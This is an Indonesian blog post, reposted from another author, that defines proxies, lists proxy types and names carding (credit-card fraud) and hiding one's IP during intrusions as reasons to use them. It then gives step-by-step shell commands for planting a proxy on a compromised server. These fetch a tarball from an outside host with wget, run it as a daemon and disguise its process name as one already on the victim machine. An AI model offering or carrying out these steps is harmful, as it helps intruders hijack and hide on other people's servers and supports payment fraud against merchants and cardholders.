Apa itu Proxi ?

Proxy adalah sebuah program yang dijalankan di server yang berfungsi sebagai penghubung antara client dan server tujuan.

A > B > C

A < style="font-weight: bold;">Jenis proxy menurut koneksi

1. proxy http
2. proxy socks
3. ssh tunnel
4. vpn
5. psybnc
6. bnc
7. proxy web (cgi, php)

Cara mendapatkan proxy

1. Free / gratis. Banyak situs-situs yang memberikan daftar proxy yang bisa dimanfaatkan tanpa harus membayar.
2. Berlangganan. Biasanya kecepatan koneksi akan lebih baik dibandingkan yang gratisan
3. Membuat sendiri di server yang berhasil di susupi

Tujuan menggunakan proxy

1. Intrusion purpose : untuk mengamankan diri saat melakukan intrusion, agar alamat IP asli tidak terdeteksi oleh server target. Karena setiap kegiatan yang berhubungan dengan intrusion akan tercatat di server target.
2. Carding purpose : untuk memperlancar proses carding, karena banyak merchant-merchant (perusahaan jasa transaksi online) yang tidak mau menerima pembayaran jika client menggunakan ip negara tertentu seperti negeria dan indonesia yang sudah masuk daftar black list.
3. Mengamankan diri terhadap kemungkinan di serang pihak lain. Misal anda melakukan chat di IRC dan anda menggunakan IP asli (tanpa proxy), jika ada seseorang tidak suka pada anda, maka bisa saja dia memeriksa IP yang anda pakai jemudian melakukan serangan DoS (Deniel of Service). Kalo sudah demikian, maka selamat tinggal koneksi. :)

Instalasi proxy di server yang disusupi

syarat

1. Bisa command shell
2. Port yang akan digunakan tidak di blok oleh firewall

Caranya

1. wget http://geocities.com/bh.crew/proxy.tgz
2. tar -zxvf proxy.tgz
3. cd pro
4. ./prox -a -d -p8888

setelah selesai... silakan di coba menggunakan proxy baru anda, akan lebih baik jika anda mengganti nama proses dari proxy yang anda jalankan. gunakan program xh atau yang lain. Di file proxy.tgz telah disertakan file xh tersebut, jadi menjalankannya sebagai berikut :

./xh -s "Nama proses palsu" ./prox -a -d -p8888

silakan ganti "Nama proses palsu" dengan nama-nama proses yang sudah ada di server korban. Anda bisa melihatnyadengan menjalankan command ps x

proxy ini adalah proxy http, jadi bisa digunakan untuk internet explorer, firefox, mirc, yahoo messenger, dan lain lain.

di ambil dari artikel atan6
Ahmad Alimuddin

Pegiat IT, pencinta startup. Pemrograman, Jaringan, Edukasi IT, makananku sehari-hari. Saat ini fokus kepada Pengembangan produk, product Management dan User Experience Research. Bapak dari 4 orang anak dari 1 istri :)

Posting Komentar

Lebih baru Lebih lama